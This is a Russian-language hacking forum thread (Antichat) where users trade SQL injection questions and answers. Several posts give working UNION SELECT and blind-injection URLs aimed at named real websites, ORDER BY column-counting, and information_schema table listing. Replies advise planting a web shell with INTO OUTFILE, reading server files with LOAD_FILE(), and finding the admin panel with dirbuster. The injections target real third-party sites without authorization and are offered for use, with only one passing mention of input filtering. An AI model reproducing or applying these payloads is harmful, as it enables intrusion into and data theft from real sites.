Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Такой вопрос, вот собственно скуля
    http://extrovert.irkutsk.ru/?id=-4+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16--

    я немного непойму как работает ето скрипт

    типа http://extrovert.irkutsk.ru/?id=4 берётся название файла из БД под id = 4 и потом инклудится?? или я нетак понял?? и ещо вопрос, как я могу етим воспользоватся?
     
  2. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    ну если ты видишь, что значение из 4 колонки попадает в функцию main, значит это должно делать для тебя какие-то выводы ;)
     
    _________________________
  3. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    Как создать админа WP 3.0 через sql injection?
     
  4. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    http://forum.antichat.ru/thread224374.html - смотри вдео, там всё показано.
     
  5. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    95% что скуль в селекте. стало быть никак.
     
    _________________________
  6. Axeline

    Axeline New Member

    Joined:
    18 Apr 2011
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Есть сайт, нашел на нем Blind Injection
    Powered-by: PHP/5.2.17
    DB Server: MySQL

    Через Havij получаю доступ к бд, админку не нашел, так же как и логин с паролем, как можно залить в данном случае шелл ?
     
  7. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    выбор не велик, всё тот же INTO OUTFILE. можно юзать в тандеме с LINES TERMINATED BY.
    как вариант можно юзать LOAD_FILE() для поиска других багов.
    можно ещё натравить какой-нить dirbuster, вкусняшек поискать. в том числе и админку)
     
    _________________________
  8. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    Ещё можно поискать phpmyadmin.
     
  9. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Доступ в бд это понятие растяжимое... если например получил пдоступ к талице с юзерами мускула) то посмотри привелегии и читаи пост выше) тоха плохого не посоветует)
    ну а если привилегий нет) то либо пости в топике о помощи в поиске админки) либо забей на скуль и иди дальше)
     
  10. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Это скуль
    1) http://www.pro-tec.com.ua/news/30'
    2) http://www.pro-tec.com.ua/lang/0'
    Помогите пожалуйста
     
  11. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    https://rdot.org/forum/showthread.php?t=1403
     
  12. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Как правильно составить конструкцию для Blind SQL на этом сайте?

    http://www.braz.by/?action=catalog_detail_model_view&data%5Bid_make%5D=555&data%5Bid_model%5D=1326 OR id=IF(ASCII(SUBSTRING((SELECT USER()),0,1)>=100,'1','0')--+
     
    #17812 FlaktW, 10 Sep 2011
    Last edited: 10 Sep 2011
  13. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    там не блайнд.
    http://www.acsavto.ru/mitsubishi/?page_id=379+union+select+1,2,3,4,5,6,7,version(),9,10,11,12
     
  14. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    да и тут тоже.
    http://www.braz.by/?action=catalog_detail_model_view&data[id_make]=555&data[id_model]=-1326+union+select+version(),2,3,4,5,6,7,8,9,10,11,12--
     
    1 person likes this.
  15. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Скажи, как ты подобрал количество полей?
     
  16. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    order+by+11--
    order+by+12--
    order+by+13--

    нет
     
    #17816 d1v, 10 Sep 2011
    Last edited: 10 Sep 2011
  17. Kudos

    Kudos New Member

    Joined:
    22 Aug 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Подскажите как вывести таблицы из определенной БД в SQL inj
    например есть БД:
    db1,db2,db3,db4 и т.д. Мне нужно вывести таблицы только из db3
    Когда то видел этот запрос но сейчас не могу найти :(
     
  18. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Code:
    SELECT TABLE_NAME  FROM `TABLES` WHERE TABLE_SCHEMA = 'db3'
     
  19. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    есть ли бага в файлах
     
  20. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    heks, нужно фильтровать данные, которые пользователь может передать скрипту.
     
Thread Status:
Not open for further replies.